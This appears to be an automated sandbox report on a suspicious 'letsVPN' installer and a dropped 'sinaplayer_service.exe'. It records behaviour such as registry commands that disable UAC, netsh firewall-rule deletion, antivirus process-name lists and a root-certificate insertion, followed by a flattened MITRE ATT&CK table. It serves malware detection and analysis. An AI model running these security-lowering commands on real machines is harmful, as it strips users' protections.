              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038F510 ??1LogMessage@logging@@QAE@XZ,CreateMutexW,CreateEventW,RegisterWaitForSingleObject,CreateNamedPipeW,SetEvent,17_2_0038F510
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000014006BC9C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_000000014006BC9C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C578D59 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,17_2_6C578D59
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00381880 ??1FilePath@base@@QAE@XZ,?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,??3@YAXPAX@Z,?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,memset,GetVersionExW,GetVersionExW,GetVersionExW,memset,VariantInit,VariantClear,VariantClear,VariantClear,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,17_2_00381880
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Disable UAC(promptonsecuredesktop)
              Source: C:\Windows\System32\reg.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
              Disables UAC (registry)
              Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
              Modifies the windows firewall
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: a2guard.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob

              Stealing of Sensitive Information

              barindex
              Modifies the DNS server
              Source: C:\Windows\System32\svchost.exeRegistry value created:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003863C0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003863C0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0037E460 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_0037E460
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003804D0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003804D0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0037E510 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_0037E510
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00376600 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00376600
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003876E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003876E0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003766C0 ??1LogMessage@logging@@QAE@XZ,??1LogMessage@logging@@QAE@XZ,??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003766C0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387790 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387790
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387830 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387830
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003878E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003878E0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387990 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387990
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387A30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0FilePath@base@@QAE@ABV01@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387A30
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387AE0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387AE0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00386AC0 ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00386AC0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387B90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00389B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00389B90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00389C30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00389C30
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387C40 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387C40
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5BD846 ??0exception@std@@QAE@XZ,??0exception@std@@QAE@XZ,_CxxThrowException,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,17_2_6C5BD846
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5BD643 Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,17_2_6C5BD643

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		1
              Replication Through Removable Media              		331
              Windows Management Instrumentation              		1
              Scripting              		1
              LSASS Driver              		321
              Disable or Modify Tools              		11
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              LSASS Driver              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory11
              Peripheral Device Discovery              		Remote Desktop Protocol11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts13
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Bypass User Account Control              		4
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares2
              Clipboard Data              		11
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		3
              Windows Service              		1
              Access Token Manipulation              		1
              Software Packing              		NTDS178
              System Information Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd11
              Registry Run Keys / Startup Folder              		3
              Windows Service              		1
              Timestomp              		LSA Secrets2
              Query Registry              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
              Process Injection              		1
              DLL Side-Loading              		Cached Domain Credentials371
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
              Registry Run Keys / Startup Folder              		1
              Bypass User Account Control              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc Filesystem261
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt42
              Masquerading              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Modify Registry              		Network Sniffing21
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd261
              Virtualization/Sandbox Evasion              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
              Access Token Manipulation              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers13
              Process Injection              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
